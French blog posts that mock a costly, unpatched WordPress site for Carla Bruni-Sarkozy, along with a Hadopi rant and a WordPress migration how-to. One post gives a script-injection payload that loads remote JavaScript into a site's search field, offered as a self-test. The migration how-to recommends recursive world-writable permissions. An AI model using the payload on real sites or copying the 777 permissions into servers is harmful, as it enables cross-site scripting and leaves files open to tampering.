Carla Bruni Sarkozy : Anatomie d’une cyber catastrophe à 410 000 euros pour le contribuable

JW7-SECURITY 3d———

Errata :

Le site Politique.net infirme les précisions du nouvelObs reprises dans cet article. Effectivement, dans son article, le NouvelObs précisait en intertitre “60 000 euros de fonctionnement”, un fonctionnement qu’il détaillait en ces termes :

“A celle-ci s’ajoutaient tous les mois les facturations de deux prestataires externes assurant pour la Première dame la gestion d’un site internet pour un montant de 25.714 euros, soit une dépense mensuelle totale de plus de 60.000 euros”, avait conclu Matignon.”

Je dois avouer que je n’ai pas spécialement vérifié cette information du NouvelObs, ce n’était d’ailleurs pas du tout l’objet de mon article qui se borne à des points techniques factuels en dehors des infos reprises. Il semblerait en fait que sur les 8 collaborateurs, seuls 2 étaient affectés à la gestion de contenu sur le site web de la première dame.

no

Politique.net nous explique que :

Or, c’est faux. Le Nouvel Obs a mélangé deux informations distinctes : d’un côté, il y avait 8 collaborateurs, de l’autre, il y avait un site web. Si le coût total du cabinet de Bruni est bien de 60 000 euros, ni la Cour des comptes, ni Matignon n’ont précisé que les 8 collaborateurs étaient en charge de la gestion du site de Carla Bruni. La preuve ? Valérie Trierweiler a cinq collaborateurs mais pas de site web. Il faut donc croire qu’ils ont autre chose à faire…

Cette information ne retire cependant rien à la démonstration faite dans l’article ci-dessous. J’irais d’ailleurs plus loin en estimant le coût réel de ce site (développement, graphisme, gestion de projet inclus) à environ 25 000 euros, soit environ la somme déboursée par le contribuable chaque mois pour l’entretien de ce site. Je serais au passage curieux de savoir de combien ce budget mensuel a été revu à la baisse depuis qu’il est assumé par la fondation et non plus par le contribuable.

Second point maintenant qui me semble important de préciser à l’occasion de cet errata. L’hébergeur du site n’est probablement pas la société qui doit occuper le plus gros du budget. Je prendrai à titre de comparaison un site, lui aussi reposant sur WordPress, d’un grand hebdomadaire français que j’héberge : sans aucun plugin de cache, sans load balancer, sans Squid, sans Varnish, sans autre chose qu’un serveur Apache correctement configuré pour accueillir sans broncher plusieurs milliers de visiteurs simultanés (soit certainement bien plus que ce que doit encaisser le site de la fondation Carla Bruni), revient à moins de 200 euros par mois. Si on le facture avec une marge à x5, on le facture environ 1000 euros HT, reste donc 24 714 euros dont on se demande bien dans quelle poche ils ont pu atterrir et surtout à quel motif.

Si l’on veut mettre un administrateur système à plein temps (faut pas rêver, ce n’est certainement pas le cas… un admin à plein temps pour ce seul WordPress : ce serait parfaitement ridicule et surréaliste), on ajoutera un budget de 5000 euros par mois, toutes charges incluses, avec tickets restau, 13e mois et arbre de noël à l’Elysée pour ses 4 gamins. Ce qui fait quand même grimper la facture à 7000 euros par mois… ok… et bien il en reste encore 18 000 !

Je continue de m’interroger sérieusement sur ces coûts quand je le mets en perspective de ce que j’ai observé.

Merci à Politique.net pour ces précisions.

Note : J’ajouterai qu’une petite erreur s’est également glissée dans l’article de Politique.net, ce ne sont pas 15 000 lectures que l’article accuse (rien que pour Rue89), mais plus de 165 000.

Note 2 : Cet article n’était initialement pas fait pour “buzzer”, et pour tout vous dire je préférerais voir un tel engouement sur les articles plus sérieux que nous produisons sur Reflets.info que cette polémique sur un site web de merde, même s’il demeure scandaleux que le contribuable en soit la victime… Et si on met Carla en tag sur nos articles Amesys, vous croyez qu’on pourra enfin “buzzer” sur des choses qui en valent le coup ?

———

Début de l’article initial :

Depuis deux jours, ça troll assez sec sur Twitter au sujet du site web de Carla Bruni Sarkozy. A l’origine,un rapport de la cour des comptes (pdf), et un article publié sur Politique.net qui révèle que le site de l’ancienne première dame aurait coûté 410 000 euros au contribuable. A ce prix, là on s’attend naturellement à une véritable merveille, d’une qualité de code irréprochable, d’un design somptueux, d’une horde de hackers chinois qui met à jour le site toutes les heures… bref quelque chose de bling bling et bien vivant.

Je suis donc naturellement allé jeter un œil, et assez rapidement, j’ai pu prendre la mesure de la catastrophe.

Première surprise, à ce prix là, on s’attend à une technologie exotique avec de nombreux développements spécifiques… et paff, on tombe sur un WordPress, le même CMS utilisé pour ce blog, ou que nous utilisons également pour Reflets.info. Si je devais chiffrer techniquement le développement d’un site comme Reflets.info, ce dernier n’excéderait pas les 4000 euros pour une petite semaine de customisation de skin et modules. Comment celui de Carla Bruni Sarkozy a t-il pu être facturé 100 fois plus cher ?… Nous allons tenter d’essayer d’y répondre.

Visiblement, ce coût exorbitant n’est pas imputable aux postes infogérance (semble t-il réalisée par Integra à en croire les DNS et le whois de l’ip du serveur qui héberge le site) et maintenance applicative. Car, c’est une autre surprise de taille, le WordPress n’est techniquement pas maintenu. Le fichier readme.html arbore fièrement une version 3.0.4. Une version qui date quand même du 29 décembre 2010. Depuis 2010, le WordPress à 410 000 euros, financé par nos impôts, n’a pas été mis à jour. A titre d’information nous en sommes, à l’heure où nous écrivons ces lignes, à la version 3.5.2 !

gkrellShoot_07-21-13_212720

Troisième surprise (et pour le coup vu la seconde, ce n’est pas franchement une surprise), le site de Carla Bruni Sarkozy est une véritable passoire. On en déduira donc que les 410 000 euros du budget de ce site ne sont  pas non plus imputables à des audits de sécurité réguliers. C’est un véritable festival niveau vulnérabilités…

Quand on part d’une base aussi moisie, on se doute bien que niveau plugins, ça doit un peu être la fête du slip string…Bingo !

On arrive dans le plus violent avec ce module très populaire NextGEN Gallery, ici, comme le montre le fichier changelog.txt du module, dans sa version 1.3.5 datée du 17 juillet 2009. Aujourd’hui, nous en sommes à la version 1.9.13. Évidemment ce plugin, dans cette version antédiluvienne, est vulnérable à quelques joyeusetés

Le site utilise un autre plugin vulnérable à un XSS, le plugin Subscribe2.

Si les 410 000 euros n’ont ni servi à l’infogérance, ni à la veille sécurité, ni à l’administration système et aux mises à jour pro-actives, ni aux développements spécifiques de fonctionnalités extraordinaires, ce budget à peut être servi à autre chose, comme le design. La skin aurait donc été développée par Zeni (site aujourd’hui disparu mais dont on trouve encore des traces sur la waybackmachine), “concepteur de sites web complexes” aujourd’hui racheté par Keyrus, spécialiste en “business intelligence“.

Comme le montre ce joli full path disclosure renvoyé par une fatal error, le nom du thème est TAMAYA-V2.

gkrellShoot_07-21-13_212844

Mouais… ben ça fait quand même un peu cher la skin.

Il y a bien un petit hack du plugin zdmultilang comme en atteste le répertoire zdmultilang-forked dans le répertoire de plugins, mais quand on voit comment il a été utilisé, on se dit que même si le fork a représenté du développement, c’était en pure perte, de simples pages statiques intelligemment nommées auraient parfaitement fait l’affaire.

Il nous reste donc la gestion de contenus : le site est encore mis à jour mais aux frais de la fondation cette fois ci. Politique.net nous explique que ce site a coûté au contribuable la bagatelle de plus de 25000 euros par mois ! Mais combien étaient ils pour poster des billets dans un WordPress !

A cette occasion, Matignon avait glissé qu’auparavant, deux prestataires externes assuraient la gestion du site de Carla Bruni, pour un coût de… 25 714 euros par mois

Mais ce n’est pas tout, car, oui, , il a bien fallu faire vivre les contenus du site et là, c’est le NouvelObs qui nous annonce la couleur, soit 8 collaborateurs pour une rémunération nette globale de plus de 36 000 euros. Soit en tout 60 000 euros par mois pour faire fonctionner un WordPress qui n’a jamais été mis à jour.

Les services du Premier ministre avaient complété cette réponse d’une comparaison avec le dispositif dont bénéficiait Carla Bruni-Sarkozy, qui n’était pas nommément citée : “huit collaborateurs étaient affectés au service de la Première dame en janvier 2012 pour une rémunération mensuelle nette globale de 36.448 euros”.

“A celle-ci s’ajoutaient tous les mois les facturations de deux prestataires externes assurant pour la Première dame la gestion d’un site internet pour un montant de 25.714 euros, soit une dépense mensuelle totale de plus de 60.000 euros”, avait conclu Matignon.

Bref… Pour avoir vu un paquet de sites WordPress, du modeste blog à l’Intranet de la mort avec des tonnes de développements spécifiques, je dois dire que je reste sidéré de constater le coût pour le contribuable de ce site si mal entretenu.

Je suis en train d’essayer de me contenir, mais voilà, il faut que ça sorte, le contribuable s’est fait escroquer, c’est pour moi une évidence. Les ingrédients pour arriver à ça sont :

  • Des prestataires multiples ;
  • Une gestion de projet qui respire l’incompétence ;
  • Des choix techniques douteux (des hacks de plugins qui ne sont plus maintenus et qui empêchent les mises à jour) ;
  • Une folie des grandeurs ;
  • Et un doigt tendu bien haut au contribuable.

 

Nouvelle peinture

Image 3Vous avez peut être remarqué que ce blog a subit un petit lifting,  c’est vrai qu’il n’était pas très beau, mais ce n’est pas la principale raison de son relooking. Le thème précédent présentait un joli trou de sécurité XSS qui m’a été signalé par Eric Seguinard de Sécuri-Toile… Et comme WordPress et moi (et le php en général) ça fait 4 je ne saurai vous dire à quel point je suis reconnaissant à Eric de m’avoir signalé ce trou. On ne le répétera jamais assez, la sécurité, c’est un process, ça prend du temps … et j’étais moi même passé à côté de ce trou à cause d’un navigateur un peu fâcho, bien que je scan régulièrement mes applis je me suis laissé berné par ce que me renvoyait mon navigateur. Donc plus qu’une nouvelle skin, je vous invite à découvrir Sécuri-Toile, le site d’Eric Seguinard et à vérifier votre propre thème WordPress en tentant d’injecter ceci dans votre champ de recherche (avec Firefox 3.x).

?s="><SCRIPT SRC=http://www.securi-toile.com/script.js></SCRIPT>"

J’ai encore pas mal de choses à tuner sur le nouveau thème mis en place ici, mais j’espère que vous y trouverez un meilleur confort de lecture que sur le précédent… en attendant d’avoir l’upload suffisant pour rapatrier ce blog sur mon serveur Hackbay hardené…

Hadopi : Muriel Marland-Militello expérimente une nouvelle méthode anti terroristes à base de WordPress… FEAR

hackc99shell-wordpressJe suis devenu un fan de Muriel Marland-Militello. Alors voilà, je le crie haut et fort :
JE T’AIME MURIEL !

Muriel Marland-Militello expérimente une nouvelle méthode anti terroriste : la désactivation des commentaires. Hummm je sens que tu es effrayé toi l’internaute terroriste qui ose cliquer sur le bouton “envoyer” du fil de commentaire de Muriel pour le faire faire exploser !

Suite à son billet un peu benêt sur les méchants pirates qui bafouent la démocratie en empêchant le Ministère de la Culture d’asséner sa propagande, le blog de Muriel Marland-Militello, a semble t-il, été la cible de centaines de milliers de commentaires cyber terroristes ! … Muriel a bien essayé de répondre au début, mais comme elle l’explique :

Cet afflux a d’ailleurs occasionné de nombreux ralentissements et dysfonctionnements de mon site internet ce matin et cet après-midi. C’est pour cela que j’ai décidé de suspendre la fonctionnalité « commentaires » .”

… dans notre jargon de terroriste, ce que vous écrivez là, ça s’appelle une “cyber connerie”, je m’explique :

1° un commentaire une fois posté ne peut en AUCUN CAS ralentir un blog ou un site web (il faudrait un flot continue de milliers de commentaires SIMULTANES pour que ceci se produise)… ou alors c’est qu’il a été codé avec les pieds sur un clavier en braille. Vous n’aviez donc AUCUNE raison de supprimer tous les commentaires qui ont afflué sur votre site, autre que celle de masquer votre manque déficit d’arguments recevables par un public qui maîtrise son sujet.

Couper les commentaires de votre blog parce qu’il rame, c’est aussi efficace que regonfler les pneus d’une voiture en panne d’essence.

Manque de bol, on sait très bien que vous utilisez WordPress, comme en atteste par exemple ce lien http://marland-militello.fr/wp-content/plugins/ ou le code source de votre site … et pour l’utiliser, nous savons aussi très bien que ce que vous nous racontez là sur les commentaires qui ralentissent un WordPress est une ânerie de première qui occulte mal ce qui va suivre :

2° ces commentaires étaient pour certains très construits et argumentés, et visiblement, ils vous ont beaucoup dérangé Muriel, c’est donc en parfait censeur, à court d’argumentation que vous avez non seulement “décidé de suspendre la fonctionnalité commentaire”, mais aussi et SURTOUT, SUPRIMÉ les commentaires existants qui en AUCUN cas ne peuvent ralentir votre “site”… Ce mensonge énorme comme le nez au milieu de la figure va faire un carton au sein de la communauté Worpress (l’une des plus vastes du Net avec des millions d’utilisateurs et des milliers de développeurs) … et vous savez quoi : c’est un logiciel “pirate” avec une licence open source qui dit en gros que les brevets logiciels que vous devez sûrement défendre, c’est de la m*****, ça se nomme la GPL)… vous n’êtes même pas digne d’utiliser un logiciel Open Source Muriel, vos propos en attestent. Vous luttez contre la notion de partage qui a rendu possible l’élaboration du script de blog que vous utilisez, vous soutenez des e-gnards qui assignent Sourceforge en justice sous prétexte que ce dernier diffuse les codes sources de logiciels permettant le partage de fichiers sur Internet. Vous devriez vous payer une licence Microsoft et un moteur de blog propriétaire, vous seriez bien plus crédible Muriel … là vous êtes tout simplement ridicule.

3° cet acte soit disant salvateur pour les performances de votre blog traduit plusieurs choses :
il y a un formidable élan anti Hadopi, les internautes sont dans leur immense majorité contre, contrairement aux mensonges que l’on peut entendre dans l’hémicycle sortir de la bouche de Christine Albanel.
Mais où sont donc les partisans de la loi Création et internet, pourquoi, eux, ils ne réagissent pas aux commentaires des terroristes qui osent défendre une certaine idée de la démocratie ? Ah oui c’est vrai, ceux qui soutiennent ce projet de loi n’utilisent pas l’Internet… ils sont pour par “solidarité républicaine”, mais tout comme vous, ils ne savent pas de quoi ils parlent.

Oh zut j’oubliais, les internautes ne sont pas du tout attachés à des valeurs républicaines et démocrates, ce sont des TERRORISTES ! Muriel, vous au moins, vous êtes une vraie démocrate, c’est surtout pour ça que je vous aime :

En effet, la possibilité pour le visiteur de laisser des commentaires, à laquelle je tiens pourtant tant, n’est visiblement pas compatible avec le zèle rédactionnel dont certains font preuve en ce moment.”

Mais Muriel voyons, on s’en fout de votre fil de commentaire, nous aussi on a des blogs, et avec une bien meilleure visibilité que votre bidule qui en temps normal draine 12 visiteurs par jour… C’est une grossière erreur de couper/censurer les commentaires, c’est le meilleur moyen d’en prendre plein la tête sur des pages à Pagerank 7.
Pourquoi ne pas prendre exemple sur Pascal Rogard qui, lui, assume parfaitement sa position et fait à cet égard preuve d’une grande intelligence… enfin quand il en a envie et que les questions ne le dérange pas trop. Mais tout le monde n’est pas aussi brillant que Mr Rogard, c’est vrai.
Un peu d’honnêteté intellectuelle Muriel, ne venez pas nous raconter, à nous, architectes du Net, que votre blog croule sous les commentaires au point de ralentir votre WordPress, pas à nous dont c’est le métier que d’administrer des machines sur lesquelles on héberge 300 blogs dont le trafic est 10 fois plus élevé que sur le votre avec 500 fois plus de commentaires …

Puis quand on regarde ne serait-ce que le nom de la machine qui héberge ce “site web” (Muriel, WordPress est un moteur de blogs, juste comme ça au passage) qui connaît un si phénoménal succès : flot.mutu.sivit.org on voit bien que ceci correspond à une offre mutualisée… saviez vous que pour seulement 29 euros par mois vous pouviez rejoindre une communauté de “pirates” crypto terroristes du nom de DEDIBOX pour accélérer un peu les performances de ce blog ?

Muriel, votre dernier commentaire est, pour toutes ces raisons, affligeant et ridicule, il conforte les internautes dans leur idée : vous êtes totalement incompétente pour comprendre ne serait-ce que le tiers du texte que vous défendez, vous ne savez pas de quoi vous parlez, et en plus vous le faite en provocant les internautes. Pire, vous n’avez aucun argument digne de ce nom à leur opposer… ceci est pathétique et consternant.

“Je tiens néanmoins à les remercier tous de l’intérêt qu’ils témoignent à mon site internet.”

Mais non Muriel, votre blog on s’en fout voyons ! Particulièrement s’il ne supporte pas quelques centaines ou milliers de commentaires … ce qui nous intéresse, ce sont vos arguments : on adore se faire traitee de pirates terroristes ! Allez encore !

Voilà Muriel, je voulais vous crier mon amour, vous êtes devenue mon idole, comme Frédéric Lefèbvre avec lequel vous partagez un amour inconditionnel pour les droits d’auteur en “piratant” des illustrations ou des musiques pour égayer vos meetings :

http://www.strapontins.org/2009/03/13/la-depute-muriel-marland-militello-est-une-pirate/

L’histoire se répète encore et encore.

On verra combien de temps votre hébergeur, sivit.org assumera vos propos, car à chaque communication si maladroite, les vrais victimes, ce sont eux qui doivent passer leur nuit à contrer des attaques pour épargner non pas votre site dont ils n’ont que faire (à 1,90 euros par mois, je peux vous garantir que depuis hier ils n’attendent qu’une chose c’est que vous changiez d’hébergeur et pendant que vous y êtes, demandez leur ce qu’ils pensent de l’HADOPI), mais les sites qui se trouvent sur le même serveur mutualisé que le votre.

Notez que je laisse ce fil de commentaire ouvert, je sais que vous allez recevoir un trackback, je sais que vous me lirez, profitez en pour cliquer sur le bouton de commentaires autant de fois que vous le souhaitez, mon blog aussi utilise WordPress et étrangement il ne craint pas les cliqueurs compulsifs. Si vous avez peur de casser le votre, lâchez vous sur le mien en venant nous exposer vos arguments et nous donner des leçons de démocratie.

/-)

Import WXR WordPress d’un fichier de plus de 2mb

wordpress-icon

Vous avez un super blog, que vous avez hébergé sur un services tiers parce que c’est bien plus simple et que ça vous épargne beaucoup d’admin …mais vous voilà bloqué pour une raison x ou y et vous souhaitez migrer vers un hébergement qui correspond un peu mieux à vos besoins ? C’est ce qui m’est arrivé ce matin quand j’ai du migrer le blog de ma compagne sur un dédié depuis l’excellente plate-forme de Maman&Co. Pour avoir vécu maintes migrations très douloureuses, je partais avec un sale à priori … mais grâce à l’intelligence de Maman&Co qui a eu la bonne idée de ne pas virer les fonctionnalités d’export et à un puissant outil d’export XML de WordPress, tout ceci s’est passé sans douleur aucune. Il va de soit que pour une fois, et bien je recommanderais ce genre de plate-forme les yeux fermés, Maman&Co fait un excellent boulot et c’est assez rare pour être souligné. Si vous cherchez une plate-forme de blogs (et ceci est valable pour n’importe quelle application web), le premier point à vérifier est bien celui de la reversibilité, ne vous enfermez jamais dans une solution technique et optez pour des formats de données ouverts (XML est amour)
Wordpress a pensé à tout, il vous est possible d’exporter tous vos articles, commentaires et catégories dans un fichier xml, puis de l’importer dans un WordPress tout neuf… génial, sauf que voilà, si votre fichier WXR fait plus de 2MB, et bien “samarchepa”.
Ceci est du à une limitation de php5, qui par défaut bloque la taille maximale d’upload à 2mb… en clair, si vous souhaitez bypasser cette limitation sur un hébergement mutualisé, vous l’avez dans le baba… pour cela il va vous falloir retoucher le fichier php.ini, ce qui implique un accès direct au file system et que vous soyez le calife des lieux
On commence par localiser le coupable avec un petit locate
$ locate php.ini
/etc/php5/apache2/php.ini
/usr/share/doc/php5-common/examples/php.ini-dist
/usr/share/doc/php5-common/examples/php.ini-paranoid
/usr/share/doc/php5-common/examples/php.ini-recommended
/usr/share/php5/php.ini-dist
/usr/share/php5/php.ini-dist.cli

Cest bien dans le Apache que ça se passe sur Debian ou sur un linux en général
$ sudo emacs /etc/php5/apache2/php.ini
à la ligne 545, vous allez trouver un truc qui ressemble à ça :
upload_max_filesize = 2M
changez la valeur pour qu’elle accepte votre fichier WXR, sauvegarder, et retentez un import de votre fichier…. pensez également à redémarrer votre Apache afin que ce dernier prenne en compte la modification et voilà le tour est joué.
Vous pouvez ensuite remettre la valeur par défaut, particulièrement si vous avez d’autres applications php installées sur la machine.

Ah si dernière chose, pensez bien à verifier que votre répertoire d’upload pour votre WXR existe et qu’il est bien accessible en écriture.
$ mkdir /var/www/votreblog/wp-content/uploads
$ chmod 777 -R /var/www/votreblog/wp-content/uploads

Le WXR va vous faire un truc assez magique : déjà il va recréer le ou les utilisateurs auteurs des contenus et mieux, il va même allez récupérer les images et fichiers de votre ancien WordPress. C’est l’un des meilleurs outils de migrations que j’ai rencontré, quel bonheur de ne pas avoir à réimporter des tables SQL… WordPress “saybien’.

bonne migration 😉

Allez on change de crèmerie !

Je commençais à me sentir un peu à l’étroit sur http://bluetouff.wordpress.com, mais comme j’aime bien WordPress, j’ai décidé de déménager et de coller ça sur un nom de domaine qui me ressemble, le tout hosté par mes soins… comme on dit : there’s no place like 192.168.0.1